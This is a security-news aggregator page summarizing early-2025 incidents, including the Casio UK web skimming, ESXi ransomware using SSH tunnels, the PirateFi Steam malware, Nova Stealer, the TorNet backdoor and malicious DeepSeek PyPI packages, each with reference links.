- ciso2ciso.com: CISO to CISO reports on the web skimming attack against Casio and 16 other websites.
- : Casio and 16 Other Websites Hit by Double-Entry Web Skimming Attack – Source:hackread.com
- ciso2ciso.com: The attackers' goal was to harvest and exfiltrate visitor information.
- Secure Bulletin: On February 3, 2025, the Casio UK online store fell victim to a significant cyberattack, leading to the unauthorized access and theft of customer credit card information.
- BleepingComputer: Casio UK's e-shop at casio.co.ukÂ
was hacked toÂ
include malicious scripts that stole credit card and customer information between January 14 and 24, 2025.
- www.bleepingcomputer.com: Bleeping Computer article on the Casio UK online store being hacked to steal customer credit cards.
- securebulletin.com: Malicious scripts on the CASIO e-shop stole credit card and personal customer details
SC Staff@scmagazine.com - 33d
Ransomware gangs are increasingly using SSH tunneling to maintain stealthy access when targeting VMware ESXi hypervisors. This technique allows attackers to remain undetected while they move laterally within the system and deploy ransomware. Cyber security firm Sygnia's investigation has revealed that after infiltrating ESXi instances by exploiting known vulnerabilities or using stolen administrator credentials, the attackers utilize the built-in SSH service to establish covert pathways for ransomware delivery. The use of SSH tunnels, often configured with remote port-forwarding to the attacker's command-and-control server, creates a semi-persistent backdoor due to the resilience and infrequent shutdowns of ESXi appliances.
This persistent access poses a serious threat to virtualized environments as ransomware can cripple an entire business by encrypting vital virtual machines. Researchers recommend that administrators monitor specific log files, including those tracking ESXi Shell command execution, user authentication, and login attempts to identify potential SSH-based intrusions. They also suggest keeping a close watch on the hostd.log and vodb.log files as key sources of information to detect potential SSH access persistence. This is critical in an effort to detect and mitigate these sophisticated attacks.
Recommended read:
References :
- BleepingComputer: Ransomware actors targeting ESXi bare metal hypervisors are leveraging SSH tunneling to persist on the system while remaining undetected.
- securityaffairs.com: Threat actors behind ESXi ransomware attacks target virtualized environments using SSH tunneling to avoid detection.
- www.scworld.com: Covert VMware ESXI-targeted ransomware hack facilitated by SSH tunneling
- www.bleepingcomputer.com: Ransomware gang uses SSH tunnels for stealthy VMware ESXi access
- ciso2ciso.com: ESXi ransomware attacks use SSH tunnels to avoid detection – Source: securityaffairs.com
- www.sygnia.co: Sygnia’s Zhongyuan Hau (Aaron) & Ren Jie Yow show how ransomware threat actors use SSH tunneling between their C2 servers and the compromised environment for persistence.
- : ESXi ransomware attacks use SSH tunnels to avoid detection – Source: securityaffairs.com
- Virus Bulletin: Sygnia’s Zhongyuan Hau (Aaron) & Ren Jie Yow show how ransomware threat actors use SSH tunneling between their C2 servers and the compromised environment for persistence.
- ciso2ciso.com: Ransomware Targets ESXi Systems via Stealthy SSH Tunnels for C2 Operations – Source:thehackernews.com
Pierluigi Paganini@Security Affairs - 14d
Valve has removed the game PirateFi from the Steam video game platform after discovering it contained malware. The free-to-play game, available on Steam, was found to be distributing the Vidar infostealing malware to unsuspecting users. Valve has also warned affected users to reformat their operating systems to ensure complete removal of any potential threats.
According to SteamDB, PirateFi was downloaded by an estimated 800 to 1,500 users before its delisting. The Steam account of the developer for the game uploaded builds to Steam that contained suspected malware. Following the game’s removal, Valve sent notifications to users who played PirateFi and recommended a complete system scan using anti-virus software.
Recommended read:
References :
- CyberInsider: Valve Removes Steam Game "PirateFi" After Malware Discovery
- Dataconomy: This Steam game is full of malware: Did you download it?
- BleepingComputer: A free-to-play game named PirateFi in the Steam store has been distributing the Vidar infostealing malware to unsuspecting users.
- securityaffairs.com: Valve removed the game PirateFi from the Steam video game platform because contained a malware
@www.bleepingcomputer.com - 8d
Critical security vulnerabilities have been patched in Juniper Networks Session Smart Routers and several Atlassian products. A critical authentication bypass vulnerability, identified as CVE-2025-21589, affects Juniper's Session Smart Router, Conductor, and WAN Assurance Managed Routers. Juniper Networks has released a patch to address this flaw, which could allow attackers to bypass authentication and gain control of affected Session Smart Router devices.
Australian software firm Atlassian has also released security patches to address 12 critical and high-severity vulnerabilities across its product suite, including Bamboo, Bitbucket, Confluence, Crowd, and Jira. Among the most severe vulnerabilities fixed is CVE-2024-50379, which has a CVSS score of 9.8 and could lead to remote code execution. Users of these products are strongly advised to apply the available patches as soon as possible to mitigate potential risks.
Recommended read:
References :
- Anonymous ???????? :af:: Juniper Networks has patched a critical vulnerability that allows attackers to bypass authentication and take over Session Smart Router (SSR) devices.
- securityaffairs.com: Australian software firm Atlassian patched 12 critical and high-severity flaws in Bamboo, Bitbucket, Confluence, Crowd, and Jira. Software firm Atlassian released security patches to address 12 critical- and high-severity vulnerabilities in Bamboo, Bitbucket, Confluence, Crowd, and Jira products. The most severe vulnerabilities addressed by the company are: CVE-2024-50379 – (CVSS score of 9.8) – RCE
@securityonline.info - 23d
Cybersecurity experts are warning of a widespread campaign involving Nova Stealer, a variant of SnakeLogger malware, now being sold as Malware-as-a-Service (MaaS) on underground forums. Priced as low as $50 for a 30-day license, Nova Stealer is designed to steal sensitive information, including credentials, keystrokes, screenshots, and clipboard data, making it an attractive tool for cybercriminals. This affordability and ease of deployment significantly lower the barrier for entry, enabling even novice attackers to launch sophisticated cyberattacks, especially targeting industries such as finance, retail, and IT.
The malware is often distributed through phishing emails disguised as legitimate documents. Once executed, Nova Stealer employs sophisticated techniques to evade detection, including steganography and process hollowing, while exploiting Windows utilities like PowerShell to disable Microsoft Defender. Stolen data is exfiltrated via channels such as SMTP, FTP, or Telegram APIs, and can be leveraged for identity theft, financial fraud, and ransomware attacks. The rise of Nova Stealer highlights the persistent threat posed by information stealers in the cybercrime ecosystem.
Recommended read:
References :
- gbhackers.com: Beware of Nova Stealer Malware Sold for $50 on Hacking Forums
- securityonline.info: $50 for Your Data: NOVA Stealer Sold as Malware-as-a-Service
- securityonline.info: The BI.ZONE Threat Intelligence team has reported a significant ongoing campaign distributing the NOVA stealer, a new commercial
- gbhackers.com: The cybersecurity landscape faces a new challenge with the emergence of Nova Stealer, a malware marketed under the Malware-as-a-Service (MaaS) model.
- cyberpress.org: Cybercriminals Selling Nova Stealer Malware for $50 on Dark Web
@www.bleepingcomputer.com - 9d
A new JavaScript obfuscation technique has been discovered and is being actively used in phishing attacks. Juniper Threat Labs identified the technique targeting affiliates of a major American political action committee (PAC) in early January 2025. The method leverages invisible Unicode characters to represent binary values, effectively concealing malicious JavaScript code within seemingly harmless text.
This obfuscation technique was first demonstrated in October 2024, highlighting the speed with which such research can be weaponized in real-world attacks. The encoding uses two different Unicode filler characters, the Hangul half-width and Hangul full width, to represent the binary values 0 and 1. This allows attackers to hide entire payloads invisibly within a script, which is then executed through a Proxy get() trap. Security researchers have posted methods to decode this encoded JavaScript into readable form.
Recommended read:
References :
- blogs.juniper.net: Invisible obfuscation technique used in PAC attack
- bsky.app: A new JavaScript obfuscation method utilizing invisible Unicode characters to represent binary values is being actively abused in phishing attacks targeting affiliates of an American political action committee (PAC).
- BleepingComputer: A new JavaScript obfuscation method utilizing invisible Unicode characters to represent binary values is being actively abused in phishing attacks targeting affiliates of an American political action committee (PAC).
- Anonymous ???????? :af:: A new JavaScript obfuscation method utilizing invisible Unicode characters to represent binary values is being actively abused in phishing attacks targeting affiliates of an American political action committee (PAC).
- www.bleepingcomputer.com: A new JavaScript obfuscation method utilizing invisible Unicode characters to represent binary values is being actively abused in phishing attacks targeting affiliates of an American political action committee (PAC).
- Christoffer S.: Juniper Networks: Invisible obfuscation technique used in PAC attack Novel obfuscation technique observed in a phishing attack targeting affiliates of a political action committee (PAC) in January 2025.
@ciso2ciso.com - 30d
A new TorNet backdoor has been discovered being spread through an ongoing phishing campaign. This malicious campaign is targeting primarily users in Poland and Germany, utilizing phishing emails written in Polish and German. These emails impersonate financial institutions and manufacturing companies, containing malicious attachments in .tgz format. When opened, a .NET loader executes, downloading the PureCrypter malware, which is then used to deploy multiple payloads. These payloads include Agent Tesla, Snake Keylogger, and the new TorNet backdoor itself.
The TorNet backdoor is particularly concerning as it establishes a connection to a command and control server via the TOR network for stealthy communications, making detection more difficult. The malware is also being distributed through an ongoing campaign and exploits Windows Scheduled Tasks to achieve persistence, including on systems with low battery. These sophisticated techniques emphasize a need for heightened security awareness training and advanced threat detection tools.
Recommended read:
References :
- ciso2ciso.com: TorNet Backdoor Detection: An Ongoing Phishing Email Campaign Uses PureCrypter Malware to Drop Other Payloads
- blog.talosintelligence.com: New TorNet Backdoor Campaign
- : TorNet Backdoor Detection: An Ongoing Phishing Email Campaign Uses PureCrypter Malware to Drop Other Payloads
- The Hacker News: PureCrypter Deploys Agent Tesla and New TorNet Backdoor in Ongoing Cyberattacks
@www.helpnetsecurity.com - 23d
Two malicious Python packages, named "deepseeek" and "deepseekai", were recently discovered on the Python Package Index (PyPI). These packages were designed to mimic client libraries for the DeepSeek AI API. However, researchers found that they contained malicious code intended to collect user and computer data, as well as environment variables that could expose sensitive information like API keys and database credentials. The packages were quickly reported to and quarantined by PyPI administrators, but were downloaded 36 times in their brief availability.
These malicious packages used Pipedream, an integration platform, as a command-and-control server to receive stolen data. The incident highlights the increasing trend of attackers exploiting the popularity of AI tools like DeepSeek and the growing use of AI in creating malicious payloads. Researchers advise developers to exercise caution when using newly released packages, especially those posing as wrappers for popular services, and to verify the authenticity of software packages before installation.
Recommended read:
References :
- www.helpnetsecurity.com: Help Net Security article on DeepSeek's popularity being exploited to push malicious packages via PyPI.
- Help Net Security: DeepSeek’s popularity exploited to push malicious packages via PyPI
@securityboulevard.com - 29d
Ransomware attacks reached a record high in December 2024, with 574 incidents reported, according to an NCC Group report. A newly identified group called FunkSec, which combines hacktivism and cybercrime, was responsible for over 100 of these attacks, making them the most active group for the month. This represents a significant surge in cybercrime with the industrial sector being targeted most often. It is believed that poor security measures, a lack of awareness and the use of evolving technologies such as Generative AI are partially responsible for this growth in attacks, along with the use of infostealer malware for gaining initial access to networks.
Other organizations have also fallen victim to ransomware attacks. The New York Blood Center Enterprises (NYBC), one of the largest non-profit blood donation organizations, had its IT systems crippled by a ransomware attack. This has caused major disruptions and risks to supplies that are sent to over 400 hospitals. Additionally, British engineering firm Smiths Group is working to restore its systems after suffering a cyberattack that caused unauthorized access, and Indian tech giant Tata Technologies had to temporarily suspend some of its IT services after being targeted by ransomware.
Recommended read:
|
|
FlagThis - #Various